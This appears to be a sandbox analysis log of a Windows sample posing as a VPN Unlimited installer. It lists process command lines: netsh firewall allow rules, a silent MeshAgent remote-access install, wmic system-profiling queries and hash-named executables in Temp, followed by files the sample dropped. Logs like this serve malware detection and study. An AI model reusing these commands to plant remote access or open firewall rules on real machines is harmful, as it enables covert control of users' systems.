C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{f6eb349c-baf2-f946-9412-d0c56a14859e}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\vpn unlimited\recovery\tap\x64"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="VPN Unlimited" dir=out action=allow program="C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" enable=yes
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000150" "31c1"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="OpenVPN" dir=in action=allow program="C:\Program Files (x86)\VPN Unlimited\openvpn.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="OpenVPN" dir=out action=allow program="C:\Program Files (x86)\VPN Unlimited\openvpn.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe
"C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe" -fullinstall
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6c096464-b4b4-439b-a21d-dc9d58a45730}
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272
"C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39df055 /state1:0x41c64e6d
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
Network
Files
C:\Users\Admin\AppData\Local\Temp\jgt.exe
memory/1700-71-0x0000000000400000-0x00000000004F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\i386\jvm.cfg
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr100.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\verify.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\client\jvm.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\java.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\meta-index
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\zip.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\meta-index
C:\Users\Admin\AppData\Roaming\Installer\lib\asm-all.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\dn-compiled-module.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-gui-ext.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-desktop-ext.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-core.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-app-framework.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-runtime.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-json-ext.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\gson.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\dn-php-sdk.jar
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\jfxrt.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-xml-ext.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-zend-ext.jar
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\currency.data
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-zip-ext.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\slf4j-api.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\slf4j-simple.jar
C:\Users\Admin\AppData\Roaming\Installer\lib\zt-zip.jar
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\security\java.security
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\jsse.jar
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\net.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\nio.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\tzdb.dat
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\tzmappings
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\resources.jar
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr120.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcp120.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\prism_d3d.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\glass.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javafx_font.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\awt.dll
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\accessibility.properties
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\jfr.jar
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gi5pjlw.igp.ps1
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.ba\logo.png
C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe
C:\Windows\Installer\e5895c5.msi
C:\Config.Msi\e5895c4.rbs
C:\Config.Msi\e5895b8.rbs
C:\Config.Msi\e5895cb.rbs
C:\Config.Msi\e5895da.rbs
C:\Windows\Temp\{24FD707A-5F42-4294-A38E-0D7DF27BADB0}\.ba\wixstdba.dll
C:\Users\Admin\AppData\Local\Temp\{f6eb349c-baf2-f946-9412-d0c56a14859e}\tap0901.sys
C:\Users\Admin\AppData\Local\Temp\{f6eb349c-baf2-f946-9412-d0c56a14859e}\tap0901.cat
C:\Users\Admin\AppData\Local\Temp\{f6eb349c-baf2-f946-9412-d0c56a14859e}\oemvista.inf
C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe
C:\Windows\SystemTemp\UDDB301.tmp
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E28096A490EA08F97F0BFE5FCD4C8CA517F4C5BF